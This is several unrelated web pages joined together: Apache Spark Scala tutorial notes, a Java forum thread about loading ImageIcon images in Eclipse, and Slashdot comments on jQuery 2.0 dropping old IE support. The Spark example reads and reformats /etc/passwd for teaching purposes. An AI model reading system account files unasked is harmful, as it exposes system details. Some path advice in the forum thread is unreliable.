val lines = sc.textFile("/etc/passwd") val validLines = lines.filter((line) => !line.startsWith("#")) val data = validLines.map((line) => line.split(':')) data.map((row) => row.mkString("\t")).saveAsTextFile("/tmp/passwd.d");
After reading in the file, the comments are removed. Then the data is transformed to a dataset of type RDD[Array[String]].
Finally the data is converted back to RDD[String] so it can be saved to the directory /tmp/passwd.d. In the output file, the fields are tab delimited instead of colon delimited.
An Array can be converted to an RDD:
val rdd = sc.parallelize(Array("foo\tbar", "baz\tquux", "wombat\twumpus"))
Using cache()
How to read or write a CSV
Datasets
Data Frames
In Spark 2.0, a DataFrame is a Dataset of Row.
Load the data into a Spark grid:
$ spark-shell scala> val df = spark.read.json("/Users/clark/samplehose.en.2016-04-14-03.json.gz")
Display the JSON Schema:
scala> df.printSchema() root |-- _augmentations: array (nullable = true) | |-- element: string (containsNull = true) |-- actor: struct (nullable = true) | |-- activityCount: long (nullable = true) | |-- description: string (nullable = true) | |-- displayName: string (nullable = true) | |-- followerCount: long (nullable = true) | |-- followingCount: long (nullable = true) | |-- id: string (nullable = true) | |-- image: struct (nullable = true) | | |-- height: long (nullable = true) | | |-- objectType: string (nullable = true) ...
How many records have positive sentiment:
scala> df.filter(df("meta.sentiment") > 0).count() res9: Long = 114
Distribution of sentiment values:
scala> df.groupBy("meta.sentiment").count().show() sentiment count 0 301 -1 33 null 5 -2 15 1 28 -3 30 2 6 -4 157 3 4 -5 13 4 3 5 7 -6 38 6 53 -7 4 7 7 -9 22 8 2 -10 3 10 3
create DataFrame from Dataset (or RDD?) createOrReplaceTempView
Map/Reduce Equivalents
I've been disappointed at times with the underlying implementation of some of the RDD methods. For example, the takeSample method seems to try to send the entire RDD to a single process, causing a failure if the RDD is large.
If you know how to implement a job as a Map/Reduce job in an efficient way, it can be replicated in Spark using map() and reduceByKey(), with some provisos. The map() lambda should return (key, value) pairs.
If you need a mapper which does not return exactly one output pair per input, use flatMap() instead of map().
If the reducer needs to change the key value in the output, use groupByKey() instead of reduceByKey(). | http://clarkgrubb.com/spark | CC-MAIN-2019-18 | refinedweb | 650 | 66.03 |
Open Source Your Knowledge, Become a Contributor
Technology knowledge has to be shared and made accessible for free. Join the movement.
Similar to variables, all code written in a program are also stored in memory during program execution. Therefore all executable code have a distinct address to be referred to. C has the flexibility to obtain the starting address of a function through a pointer - known as function pointer.
Consider the following function
int multiply(short a, short b) { return (int)a * (int)b; }
To store the address of this function in a function pointer, following syntax is used:
int (*pf)(short, short) = multiply; ^ ^ ^ ^ | | | function name | | function parameter types inside parentheses | variable name followed by *, everything enclosed inside parentheses function return type
Once declared, the variable name (
pf here) can be used as a function:
What's the point of having a function pointer where we can directly call the function? Sometimes there are multiple similar (same prototype) functions to call and a decision must be made at runtime. Here is a complete example.
Sorting Student Database
Suppose we want to create a database of students. For simplicity, each student will have a unique id, name and passing year.
#define MAX_NAME_SIZE 1000 typedef struct { uint32_t id; char name[MAX_NAME_SIZE]; uint32_t passing_year; } Student;
We declare a database (simply an array will work for us) of students and initialize everything to 0 (good practice to avoid undefined behaviour).
#define MAX_STD_SIZE 30 Student std_db[MAX_STD_SIZE]; memset(std_db, 0, sizeof(std_db));
We populate this array somehow (in this example, students will be randomly populated). Now we've a collection of students. Looking them one by one for specific information may not be efficient. For example, we may want a list of students sorted by passing year. Or we may want a list of student names sorted by their names for easy lookup.
In this example we're going to sort the student array using
qsort function available in
stdlib.h library. But simply calling
qsort with the array isn't enough because
qsort has no idea about how to sort two
Students. Instead,
qsort takes a function pointer as a parameter to compare two
Student objects with one another to determine their position with respect to each other.
This kind of comparison function is also known as comparator. It has the following prototype for
qsort:
int (*compar)(const void *, const void *)
This function takes two pointers to objects to compare with each other. Requirements for this comparator is as follows:
- If the objects are equal, it will return 0.
- If the first object should be placed before the second object in the sorted array, it will return a negative integer.
- If the first object should be placed after the second object in the sorted array, it will return a positive integer.
We'll define two comparators in this example to pass to
qsort so that the student array can be sorted as we wish.
Sort by passing year
Sort by passing year is easy. The objects pointed to by the void pointers are cast to
Student object. Then if the second passing year is subtracted from first passing year the requirement of comparator function is fulfilled.
int sort_by_passing_year(const void* a, const void* b) { const Student *sa = a; const Student *sb = b; return sa->passing_year - sb->passing_year; }
Sort by name
The name of the student with less characters can be considered to come first. If the lengths of the names are same, then a character-by-character comparison needs to be performed to determine which name comes first.
int sort_by_name(const void* a, const void* b) { const Student *sa = a; const Student *sb = b; int lena = strlen(sa->name); int lenb = strlen(sb->name); if (lena == lenb) { /* Names having same length */ for (int i = 0; i < lena; i++) { if (sa->name[i] != sb->name[i]) { return sa->name[i] - sb->name[i]; } } /* Names are same */ return 0; } /* Consider the name with less character to be the lesser of two objects */ return lena - lenb; }
With the comparator functions defined, the array of student objects can be sorted by name:
qsort(std_db, MAX_STD_SIZE, sizeof(std_db[0]), sort_by_name);
or passing year:
qsort(std_db, MAX_STD_SIZE, sizeof(std_db[0]), sort_by_passing_year);
Full example together: | https://tech.io/playgrounds/14589/how-to-play-with-pointers-in-c/function-pointers | CC-MAIN-2018-30 | refinedweb | 704 | 50.36 |
by Yan Cui
How to auto-create CloudWatch Alarms for APIs with CloudWatch Events and Lambda
In a previous post, I discussed how to auto-subscribe a CloudWatch Log Group to a Lambda function using CloudWatch Events. The benefit of this is that we don’t need a manual process to ensure all Lambda logs are forwarded to our log aggregation service.
Whilst this is useful in its own right, it only scratches the surface of what we can do. CloudTrail and CloudWatch Events make it easy to automate many day-to-day operational steps, with the help of Lambda of course ?
I work with API Gateway and Lambda a lot. Whenever you create a new API, or make changes, there are several things you need to do:
- Enable Detailed Metrics for the deployment stage
- Set up a dashboard in CloudWatch, showing request count, latencies, and error counts
- Set up CloudWatch Alarms for P99 latencies and error counts
Because these are manual steps, they often get missed.
Have you ever forgotten to update the dashboard after adding a new endpoint to your API? And did you also remember to set up a P99 latency alarm on this new endpoint? How about alarms on the number of 4XX or 5xx errors?
Most teams I’ve dealt with have some conventions around these, but they don’t have a way to enforce them. The result is that the convention is applied in patches and cannot be relied upon. I find that this approach doesn’t scale with the size of the team.
It works when you’re a small team. Everyone has a shared understanding, and the necessary discipline to follow the convention. When the team gets bigger, you need automation to help enforce these conventions.
Fortunately, we can automate away these manual steps using the same pattern. In the Monitoring unit of my course Production-Ready Serverless, I demonstrated how you can do this in 3 simple steps:
- CloudTrail captures the CreateDeployment request to API Gateway
- CloudWatch Events pattern against this captured request
- Lambda function to enable detailed metrics, and create alarms for each endpoint
If you use the Serverless framework, then you might have a function that looks like this:
A couple of things to note from the code above:
- I’m using the serverless-iam-roles-per-function plugin to give the function a tailored IAM role
- The function needs the
apigateway:PATCHpermission to enable detailed metrics
- The function needs the
apigateway:GETpermission to get the API name and REST endpoints
- The function needs the
cloudwatch:PutMetricAlarmpermission to create the alarms
- The environment variables specify SNS topics for the CloudWatch Alarms
The captured event looks like this:
We can find the
restApiId and
stageName inside the
detail.requestParameters attribute. That’s all we need to figure out what endpoints are there, and so what alarms we need to create.
Inside the handler function, which you can find here, we perform a few steps:
- Enable detailed metrics with an
updateStagecall to API Gateway
- Get the list of REST endpoints with a
getResourcescall to API Gateway
- Get the REST API name with a
getRestApicall to API Gateway
- For each of the REST endpoints, create a P99 latency alarm in the
AWS/ApiGatewaynamespace
Now, every time I create a new API, I will have CloudWatch Alarms to alert me when the 99 percentile latency for an endpoint goes over 1 second, for 5 minutes in a row.
All this, with just a few lines of code ?
You can take this further, and have other Lambda functions to:
- Create CloudWatch Alarms for 5xx errors for each endpoint
- Create CloudWatch Dashboard for the API
So there you have it! A useful pattern for automating away manual operational tasks.
And before you tell me about the ACloudGuru AWS Alerts Serverless plugin by the ACloudGuru folks, yes I’m aware of it. It looks neat, but it’s ultimately still something the developer has to remember to do.
That requires discipline.
My experience tells me that you cannot rely on discipline, ever. Which is why I prefer to have a platform in place that will generate these alarms instead. | https://www.freecodecamp.org/news/how-to-auto-create-cloudwatch-alarms-for-apis-with-cloudwatch-events-and-lambda-b128920857aa/ | CC-MAIN-2019-43 | refinedweb | 693 | 54.76 |
07 October 2010 14:06 [Source: ICIS news]
LONDON (ICIS)--French Union CGT said on Thursday that it was possible further strike action would spread from the Fos-Lavera oil terminal in southern France to the four refineries in the region, as workers at INEOS's Lavera site ended their eight-hour strike.
Workers at INEOS’s refinery, which is one of the refineries in the region that in total account for one-third of ?xml:namespace>
Workers at the other three refineries in the Fos-Lavera area - Total's 158,000 La Mede refinery, ExxonMobil’s Fos-sur-Mer plant and LyondellBasell’s Berre L'Etang refinery - had not joined the protest at INEOS, which eased fears there would be an immediate shutdown of the region's oil processing capacity, CGT added.
More than 40 oil, gas, chemical and product tankers are at anchorage at the port awaiting the resumption of normal activities. However, talks between Fos-Lavera strikers and the management of the Mediterranean port remained in deadlock.
The port has now entered its 11th day of protests and supplies of crude oil to the four refineries have been interrupted, the French oil industry association, UFIP, said.
To worsen matters, unions have been organising strikes and mass demonstrations across. | http://www.icis.com/Articles/2010/10/07/9399569/french-union-says-further-strike-action-at-refineries-possible.html | CC-MAIN-2013-20 | refinedweb | 211 | 51.92 |
2007 Canadian Computing Competition, Stage 2
Day 2, Problem 2: Particle Catcher
You may have heard that you cannot observe both the speed and location of a subatomic particle, simultaneously. At least, not until today, since computer scientists can ignore physicists whenever we want.
Your task is to determine both the speed and location of a particle that is moving around a nucleus. Of course, we will assume that the particle is moving in a circular orbit and moving at a constant velocity.
You can use your high-tech measuring device (which is, in fact, the synthesis of a spoon and a Commodore-64) to perform the following 3 different queries:
GetSize() - this method returns the integer representing the number of different positions in one orbit of the particle. You may assume that if this function returns N, the positions are labelled 0, ..., N-1. You may assume 2 ≤ N ≤ 100,000.
Look(a, b) - returns true if the point is in the range from a..b (where 0 ≤ a ≤ b ≤ N-1) at this moment and false otherwise. This method will be called repeatedly, but subsequent calls cause the particle to move v positions from its current position. In other words, the particle is moving at v units per query. The first call to this method will query the initial position of the point (i.e., the
GetSize() method does not advance the point).
Guess(v, p) - will record the final velocity v and final position p (where 0 ≤ v, p ≤ N-1). There is exactly one call to this method, which will terminate the high-tech measuring device (i.e., no other calls may be made) and the high-tech device will output a statement indicating the success or failure of the guess (whether the point is at position p and velocity v when the call to
Guess is made.) Note that the particle is v units away from where it was at the last query statement.
You have a limit of 100
Looks, so be wise about your queries.
Interacting with the Judge
The methods mentioned above can be accessed through regular input/output.
- The first line of input to your program will be N. (
GetSize())
- After that, you'll have to
Look. To
Look(a, b), just output a and b separated by a space on one line.
- To get the result of your look, read an integer. You will receive
1(true) or
0(false) accordingly.
- Repeat steps 2-3 as desired.
- To make your final
Guess, output "
G v p" on one line where v and p are your guesses for the velocity/position.
You'll also need to
fflush(NULL) [C++] or
flush(output) [Pascal] whenever you output something.
Sample Code
#include <iostream> using namespace std; int main() { int N; scanf("%d", &N); //look around printf("%d %d\n", 0, N-1); fflush(NULL); int result; scanf("%d", &result); //result of the look int v = 1, p = 2; printf("G %d %d\n", v, p); //final guess fflush(NULL); return 0; }
All Submissions
Best Solutions
Point Value: 40 (partial)
Time Limit: 2.00s
Memory Limit: 128M
Added: Jan 17, 2009
Languages Allowed: | http://wcipeg.com/problem/ccc07s2p5 | CC-MAIN-2018-26 | refinedweb | 529 | 71.04 |
Created on 2013-09-05 02:51 by ethan.furman, last changed 2013-09-15 01:53 by python-dev. This issue is now closed.
Part of the solution for Issue18693 is to have `inspect.classify_class_attrs()` properly consider the metaclass (or type) of the class when searching for the origination point of class attributes.
The fix is changing line 325:
- for base in (cls,) + mro:
+ for base in (cls,) + mro + (type(cls),):
or line 361:
- return cls.__mro__
+ return cls.__mro__ + (type(cls), )
Should we target previous Pythons with this fix?
The global fix causes these two tests to fail:
======================================================================
FAIL: test_newstyle_mro (test.test_inspect.TestClassesAndFunctions)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/home/ethan/source/python/issue18693/Lib/test/test_inspect.py", line 485, in test_newstyle_mro
self.assertEqual(expected, got)
AssertionError: Tuples differ: (<class 'test.test_inspect.Tes... != (<class 'test.test_inspect.Tes...
Second tuple contains 1 additional elements.
First extra element 5:
<class 'type'>
(<class 'test.test_inspect.TestClassesAndFunctions.test_newstyle_mro.<locals>.D'>,
<class 'test.test_inspect.TestClassesAndFunctions.test_newstyle_mro.<locals>.B'>,
<class 'test.test_inspect.TestClassesAndFunctions.test_newstyle_mro.<locals>.C'>,
<class 'test.test_inspect.TestClassesAndFunctions.test_newstyle_mro.<locals>.A'>,
- <class 'object'>)
? ^
+ <class 'object'>,
? ^
+ <class 'type'>)
======================================================================
FAIL: test_help_output_redirect (test.test_pydoc.PydocDocTest)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/home/ethan/source/python/issue18693/Lib/test/test_pydoc.py", line 396, in test_help_output_redirect
self.assertEqual(expected_text, result)
AssertionError: "Help on module test.pydoc_mod in test:\n\nNAME\n test.pydoc_mod - This is a [truncated]... != "Help on module test.pydoc_mod in test:\n\nNAME\n test.pydoc_mod - This is a [truncated]...
Help on module test.pydoc_mod in test:
NAME
test.pydoc_mod - This is a test module for test_pydoc
CLASSES
builtins.object
A
B
class A(builtins.object)
| Hello and goodbye
+ |
+ | Method resolution order:
+ | A
+ | builtins.object
+ | builtins.type
|
| Methods defined here:
|
| __init__()
| Wow, I have no function!
|
| ----------------------------------------------------------------------
| Data descriptors defined here:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class B(builtins.object)
+ | Method resolution order:
+ | B
+ | builtins.object
+ | builtins.type
+ |
| Data descriptors defined here:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| NO_MEANING = 'eggs'
======================================================================
I suspect (hope) updating the tests would be fine.
Another option with the global fix is to only add the metaclass to the mro if the metaclass is not 'type'.
Of course it is causing tests to fail. You are changing behaviour of an existing API. Please find another solution.
Okay, taking a step back.
It seems that currently inspect is geared towards instances and classes, not metaclasses. Consequently, so is help.
So, how do we enhance inspect so that help can be metaclass aware?
classify_class_attrs seems like an obvious choice, and it's docstring currently says this:
def classify_class_attrs(cls):
"""Return list of attribute-descriptor tuples.
For each name in dir(cls), the return list contains a 4-tuple
with these elements:
0. The name (a string).
1. The kind of attribute this is, one of these strings:
'class method' created via classmethod()
'static method' created via staticmethod()
'property' created via property()
'method' any other flavor of method
'data' not a method
2. The class which defined this attribute (a class).
3. The object as obtained directly from the defining class's
__dict__, not via getattr. This is especially important for
data attributes: C.data is just a data object, but
C.__dict__['data'] may be a data descriptor with additional
info, like a __doc__ string.
"""
We could add additional 'kind' of 'hidden class method', and 'hidden class attributes' and then have classify_class_attrs explicitly search metaclasses.
Or, since we have to make a new getmembers (getmetaclassmembers?), we could also make a new classify_metaclass_attrs that handled both class and metaclass.
> It seems that currently inspect is geared towards instances and
> classes, not metaclasses. Consequently, so is help.
I'm afraid I don't really understand what you're talking about. A
metaclass is just a slightly different kind of class :-)
> def classify_class_attrs(cls):
> """Return list of attribute-descriptor tuples.
>
> For each name in dir(cls), the return list contains a 4-tuple
> with these elements:
[...]
> We could add additional 'kind' of 'hidden class method', and 'hidden
> class attributes' and then have classify_class_attrs explicitly search
> metaclasses.
The docstring is clear: "For each name in dir(cls)". If you want stuff
that hidden's in the cls.__class__ (and, consequently, not in dir(cls)),
then you are not looking for the right function, I think.
I can understand wanting to better automate lookup of methods on
classes, rather than on instances, but it would probably deserve another
function.
But I have another question first: doesn't calling
classify_class_attrs() on the metaclass already do what you want?
Antoine, to answer all your questions at once, and using an Enum as the example:
--> dir(Color)
['__class__', '__doc__', '__members__', '__module__', 'blue', 'green', 'red']
--> Color.__members__
mappingproxy(OrderedDict([('red', <Color.red: 1>), ('green', <Color.green: 2>), ('blue', <Color.blue: 3>)]))
-->help(Color)
========================================
Help on class Color in module __main__:
Color = <enum 'Color'>
========================================
Why? Because __members__ is not in Color.__dict__
--> Color.__dict__.keys()
dict_keys(['_member_type_', '_member_names_', '__new__', '_value2member_map_', '__module__', '_member_map_', '__doc__'])
and inspect.classify_class_attrs doesn't look in metaclasses, instead assigning None as the class if it can't find it:
--> inspect.classify_class_attrs(Color) # output trimmed for brevity
Attribute(name='__members__', kind='data', defining_class=None, object= ... )
So, even though __members__ does show up in dir(Color), classify_class_attrs incorrectly assigns its class.
Can I use classify_class_attrs on Color.__class__? Sure, but then I get 50 items, only one of which was listed in dir(Color).
Interestingly, getmembers(Color) does return __members__, even though it is a metaclass attribute and the docs warn that it won't:
--> print('\n'.join([str(i) for i in inspect.getmembers(Color)]))
('__class__', <attribute '__class__' of 'object' objects>)
('__doc__', None)
('__members__', mappingproxy(OrderedDict([('red', <Color.red: 1>), ('green', <Color.green: 2>), ('blue', <Color.blue: 3>)])))
('__module__', '__main__')
('blue', <Color.blue: 3>)
('green', <Color.green: 2>)
('red', <Color.red: 1>)
So if getmembers() correctly reports it because it shows up in dir(), then classify_class_attrs should correctly identify it as well.
This is a more useful help() -- patch attached.
==============================================================================
Help on class Color in module __main__:
class Color(enum.Enum)
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|
| Data and other attributes defined here:
|
| blue = <Color.blue: 3>
|
| green = <Color.green: 2>
|
| red = <Color.red: 1>
|
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|
| Returns a mapping of member name->value.
|
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping.
> So, even though __members__ does show up in dir(Color),
> classify_class_attrs incorrectly assigns its class.
>
[...]
>
> So if getmembers() correctly reports it because it shows up in dir(),
> then classify_class_attrs should correctly identify it as well.
Ok, you got me convinced :-)
Cool. Latest patch has a slight doc fix for getmembers.
Will commit on Friday if no other pertinent feedback.
New changeset b0517bb271ad by Ethan Furman in branch 'default':
Close #18929: inspect.classify_class_attrs will now search the metaclasses (last) to find where an attr was defined. | http://bugs.python.org/issue18929 | CC-MAIN-2015-40 | refinedweb | 1,174 | 53.17 |
php_stream_sock_open_unix() attempts to open the Unix domain socket
specified by
path.
pathlen specifies the
length of
path.
If
timeout is not NULL, it specifies a timeout period for the connection attempt.
persistent indicates if the stream should be opened as a persistent
stream. Generally speaking, this parameter will usually be 0.
Note: This function will not work under Windows, which does not implement Unix domain sockets. A possible exception to this rule is if your PHP binary was built using cygwin. You are encouraged to consider this aspect of the portability of your extension before it's release.
Note: This function treats
pathin a binary safe manner, suitable for use on systems with an abstract namespace (such as Linux), where the first character of path is a NUL character. | http://idlebox.net/2007/apidocs/php-manual-20070505.zip/streams.php-stream-sock-open-unix.html | CC-MAIN-2013-48 | refinedweb | 129 | 57.06 |
Tweeting your Sun Storage 7000 Appliance Alerts
By pmonday on Dec 17, 2009
Twitter, Instant Messages, Mobile Alerts have always fascinated me. I truly believe that a Storage Administrator should not have to leave the comfort of their iPhone, Droid or Palm Pre to do 90% of their day to day management tasks. As I was scanning the headlines of blogs.sun.com I saw this great article on Tweeting from Command Line using Python.
So, leading into how to manage a Sun Storage 7000 Appliance using Alerts (the next article in my series) I thought I would take some time and adapt this script to tweet my received Sun Storage 7000 Appliance Traps. I am going to use the AK MIB traps (to be explained in more detail in the next article) to achieve this.
Writing the Python Trap Handler
First, create the trap handler (this is based on the Python Script presented in the Blog Article: Tweeting from Command Line using Python).
Here is the Python Script:
#!/usr/bin/python
import sys
from os import popen
def tweet(user,password,message):
print 'Hold on there %s....Your message %s is getting posted....' % (message, user)
url = ''
curl = '/usr/dist/local/sei/tools/SunOS-sparc/curl -s -u %s:%s -d status="%s" %s' % (user,password,message,url)
pipe = popen(curl, 'r')
print 'Done...awesome'
if __name__ == '__main__':
host = sys.stdin.readline()
ip = sys.stdin.readline()
uptime = sys.stdin.readline()
uuid = sys.stdin.readline()
alertclass = sys.stdin.readline()
alertcount = sys.stdin.readline()
alerttype = sys.stdin.readline()
alertseverity = sys.stdin.readline()
alertsresponse = sys.stdin.readline()
messageArray = [host,ip,alerttype]
t=","
message = t.join(messageArray)
message = message[0:140]
user = "yourtwitter" #put your username inside these quotes
password = "yourpassword" #put your password inside these quotes
tweet(user,password,message)
You will have to make the following changes at a minimum
- Re-insert the missing tabs based on Python formatting
- Ensure the path to CURL is appropriate
- Change the user and password variables to your Twitter account
Once that is done you should be set.
Adding the Trap Handler to SNMP
Next, set up your snmptrapd.conf to handle traps from the AK MIB by invoking the Python Script above. My /etc/sma/snmp/snmptrapd.conf looks something like this:
traphandle .1.3.6.1.4.1.42.2.225.1.3.0.1 /export/home/oracle/ak-tweet.py
The OID .1.3.6.1.4.1.42.2.225.1.3.0.1 identifies the sunAkTraps portion of the AK-MIB delivered with the Sun Storage 7000 Appliance.
Now, invoke snmptrapd using the above configuration file (there are many ways to do this but I am doing the way I know will pick up my config file
/usr/sfw/sbin/snmptrapd -c /etc/sma/snmp/snmptrapd.conf -P
Sending Alerts from the Sun Storage 7000
Using the article I posted yesterday, ensure SNMP is enabled with a trapsink identifying the system where your trap receiver is running. Now we have to enable an alert to be sent via SNMP from your Sun Storage 7000 Appliance (this is different from the default Fault Management Traps I discussed yesterday).
For now, trust me on this, I will explain more in my next article, let's enable a simple ARC size threshold to be violated. Go into the Browser User Interface for your system (or the simulator) and go into the Configuration -> Alerts screen. Click through to the "Thresholds" and add one that you know will be violated, like this one:
Each alert that is sent gets posted to the twitter account identified within the Python Script! And as my friends quickly noted, from there it can go to your Facebook account where you can quickly declare "King of the Lab"!
Thanks Sandip for your inspiring post this morning
| https://blogs.oracle.com/pmonday/?cat=Storage+Management&date=200912 | CC-MAIN-2015-27 | refinedweb | 635 | 55.74 |
I did ImageIcon like that API suggested, but it's not finding the file, while clearly exists as I was able to import it to the java projects itself, yet it can't find it. What's going did ImageIcon like that API suggested, but it's not finding the file, while clearly exists as I was able to import it to the java projects itself, yet it can't find it. What's going on?!?
::
It is very difficult to help you without any code and information. Are you specifying an absolute or relative path? Are you trying to open this from a class that is in a package? The more info the better
Is the Image in the same scope as your program? If it is you can use the name directly. else you have to use c:blahh blahh
I had it imported into the project, yes.
I tried lots of things, including having the word images/ in the quotes.
It's showing in the thing that shows all the components of the package in Eclipse.
It's under a column called "Referenced Libraries".
Also, by any chance is the image being lost, as I have a JComboBox, that will show certain pictures when certain choices are selected. I have the JComboBox outside of the JSplitPane but still in the JFrame, and I have a JTextArea in one of the sides and it is supposed to have a label that is set to an icon on the other. When another option is selected, the previous picture is removed from the component, though it should be able to come back if selected again in the JComboBox, and a new one takes its place. This is done to keep from getting a build up off too many pictures that I don't want showing. This is kind of like a column in an online newspaper, not I'm not making an applet, where the story and the image change inside the JSplitPane when the user selects a different story in the JComboBox. That's kind of what it's like. Except the JLabel, set to the image, won't show, as the method that, very cleverly, will make a new ImageIcon from a file and also a description, which I pass it in the parameters. However, it is returning path not found. "image name".
I got the createImageIcon method from this:
Do I have to have the whole path name from the description in order for it to recognize the image if it isn't in the same scope as the program?
By description, I don't mean the parameter, I mean the thing that tells me where the file is and all that stuff when I click on the image and click "Properties" on the popup menu that comes when I click on it on my computer?
Last edited by javapenguin; July 8th, 2010 at 03:54 PM.
The path to the image depends upon where your image in in your Eclipse project. A matter or preference, but I usually either import it into the project by right clicking the project and going to import and from there choose the image, or for larger projects and to keep things a bit more ordered create a new package called images, right click that and import the image there. From your createImageIcon function, call the 'full' path: either "/myImage.jpg" or "/images/myImage.jpg" - note the beginning slash specifying the root folder of the project (otherwise the JVM will look in the location where the calling class is located).
Tried that. Now what goes before the / ?
Does it matter by chance how many bytes the image has?
Do I put the path name in the quotes or the entire location of where the picture is?
try something. Type in the absolute path when you create the file and see if it can see it then. Remember that if your using Windows, file directories are moved through by "\\" in java, not "/".
If it can find the file at that point, it means that something in your declaration of the relative path.
What's an absolute path?
Is it the entire long drawn out path with the folder C and everything
Ok, is the absolute path the file location? I have no clue what an absolute path is.
Ok, here are several examples of things I'm going to try.
Option One: "//images//myIcon.jpg"
Option Two: "//myIcon.jpg""
Option Three: "//projectName//myIcon.jpg"
Option Four: "\\projectName\\src\\subFolder\\Users\\me\\Downloa ds\\myIcon.jpg"
Option Five: Option four without the beginning \\
Option Six: Option Two without \\ at beginning
Last edited by javapenguin; July 8th, 2010 at 06:01 PM. Reason: Clarifying
The absolute or relative paths can be navigated either using \\ or / in windows. The only reason you need \\ is because \ by itself signals the beginning of an escape character. The actual path you will get will only have one \ because you "escaped" out of the escape character.
An absolute path is the path that completely describes the location of the file starting from which partition it's in (say, C:\ in windows). A relative path is a path that describes the exact same location but relative from some point.
You can test to see if you're even finding the image:
In eclipse, the startup folder is the base project folder. If you put your image right into the base project folder, you can just put the file name and it should find it (fyi, this is a relative path).
If your image is not located in exactly the same folder you're referencing from, you need to use "dots" to navigate upwards, then specifically spell out which folders to navigate back down.
File file1 = new File("../image.png"); // the image is in the folder above this one File file2 = new File("../../Other Folder/image.png"); // the image is two folders up, then inside Other Folder File file3 = new File("./image.png"); // image is in the same folder. Notice only one dot File file4 = new File("image.png"); // same thing as file3
Last edited by helloworld922; July 9th, 2010 at 01:07 AM.
import javax.swing.JFileChooser; import java.io.File; public class FileOpen { public static void main(String args[]) throws Exception { JFileChooser fileChooser = new JFileChooser(); fileChooser.showOpenDialog(null); File file = fileChooser.getSelectedFile(); System.out.println(file.getAbsolutePath()); } }
This will open up a basic file chooser. Go through the file chooser and select the file and press ok. It will then print out the absolute path of the file you selected. I use the absolute path file returns when I need to reference the xls files I read and write to using SmartXLS, so it does work to connect to a file.
Insistently, I guess you dont have to use the \\ to go through directories. However I've used it since I was told I did and it has always worked for me, so I dunno.
To clarify this a bit, absolute and relative paths have a somewhat different meaning when discussing a computer file system versus the package system the original poster is using (eg using Class.getResource()). Using the createImageIcon method (which uses Class.getResource()) a relative path is relative to the class, and the absolute path is relative to the package.
To reiterate my instructions I alluded to above for Eclipse:
- Right click the Project and choose Import.
- Select the file(s) of choice
- This imports the files into the 'root' location of your project.
- To access this image, for example say its name is "myImage.jpg", use the package absolute path: createImageIcon("/myImage.jpg", "Image description");
- If you imported your image into the package the calling class resides in, remove the beginning slash
- You can import an image into any package, but you must tell the JVM where the image is by using unix type paths ('../' to backtrack up a directory, '/' at the beginning to specify the root, './' to specify this directory, etc...)
Last edited by copeg; July 8th, 2010 at 08:57 PM.
In java you can use forward slash, but you have to use 2 of them. EXAMPLE: "SRC//Images//icon.png"
//"); }
By the same token, the same applies to back-slash, just remember that back-slash is the escape character so they MUST come in pairs of 2.
//"); }
Last edited by helloworld922; July 9th, 2010 at 01:06 AM. | http://www.javaprogrammingforums.com/whats-wrong-my-code/4744-stupid-thing-cant-find-image-icon-right-front.html | CC-MAIN-2015-18 | refinedweb | 1,406 | 71.44 |
C++.......as stated above...thanks for any answer
5 replies to this topic
#1
Posted 28 September 2010 - 11:46 PM
#2
Posted 29 September 2010 - 02:23 AM
#include <iostream> #include <fstream> #include <string> #include <vector> using namespace std; int main() { ifstream file( "items.txt" ) ; string line ; vector<string> lines ; while( getline( file, line ) ) lines.push_back( line ) ; cout << "#items: " << lines.size() << '\n' ; } 29 September 2010 - 06:11 PM
if i don want to use string and vector?becauce we not yet learn vector
#4
Posted 30 September 2010 - 10:16 AM
Just input each "item" into a variable, increment a counter, and loop through that until EOF is found.
Latinamne loqueris?
#5
Posted 30 September 2010 - 10:12 PM
if we do not know what is the item in the external file,what should we do to calculate the total number of items?
#6
Posted 01 October 2010 - 05:35 AM
Read it as binary data and count new lines? Does this work?
A conclusion is where you got tired of thinking.
#define class struct // All is public.
1 user(s) are reading this topic
0 members, 1 guests, 0 anonymous users | http://forum.codecall.net/topic/59157-how-to-know-the-total-number-of-items-from-external-file-by-using-array-and-function/ | crawl-003 | refinedweb | 193 | 73.37 |
jQuery 2.0 Will Drop Support For IE 6, 7, 8
Soulskill posted more than 2 years ago | from the go-big-or-go-home dept.
> (4, Insightful)
Krojack (575051) | more than 2 years ago | (#40642215)
Re:Like (1)
Anonymous Coward | more than 2 years ago | (#40642259)
I agree that a lot of situations will not be able to move to 2.0, but I bet you will see it implemented a lot more than you would expect.
Re:Like (1)
Anonymous Coward | more than 2 years ago | (#40642375)
I agree. You see more and more websites that are dropping compatibility with older versions of IE, and direct users to Firefox or Chrome. It's a good thing too. It's annoying to dumb down on features for website, just because a small portion of them refuse to upgrade to better browsers.
Corporate websites, it's not going to matter. They'll just continue using an old version of jQuery on Firefox 3.6 or something.
Re:Like (0)
Anonymous Coward | more than 2 years ago | (#40642273)
The problem is they're dropping support for 8, which is still popular. 7 is still popularish, but wouldn't be that big a deal at under 10%. 6 is practically dead at this point.
IE8 = "latest" version for many (5, Insightful)
tverbeek (457094) | more than 2 years ago | (#40642505) (5, Interesting)
dingen (958134) | more than 2 years ago | (#40642633)
The problem is that IE8 handles Javascript in much the same non-standard way als IE6 & IE7. If a library such as jQuery includes support for IE8, it's supporting IE6 & IE7 as well.
Re:IE8 = "latest" version for many (4, Informative)
jellomizer (103300) | more than 2 years ago | (#40642899)
However my organization just Upgraded to IE 8.
There isn't any plan to be going to 9 in the near future as there are too apps that have issues with following Open Standards.
Re:IE8 = "latest" version for many (2)
dingen (958134) | more than 2 years ago | (#40642929)
That's why the jQuery team is going to provide security fixes for 1.9 for a while.
Re:IE8 = "latest" version for many (1)
denis-The-menace (471988) | more than 2 years ago | (#40643087)
Chrome + IEtab = solved
configure IETab to use IE when chrome hits one of your ass-backwards web apps.
Re:IE8 = "latest" version for many (3, Informative)
steveb3210 (962811) | more than 2 years ago | (#40643093)
Re:IE8 = "latest" version for many (1)
colinrichardday (768814) | more than 2 years ago | (#40643317)
What if a developer needs a (standard) feature that a browser doesn't support?
Re:IE8 = "latest" version for many (0)
Anonymous Coward | more than 2 years ago | (#40643389)
What if a developer needs a (standard) feature that a browser doesn't support?
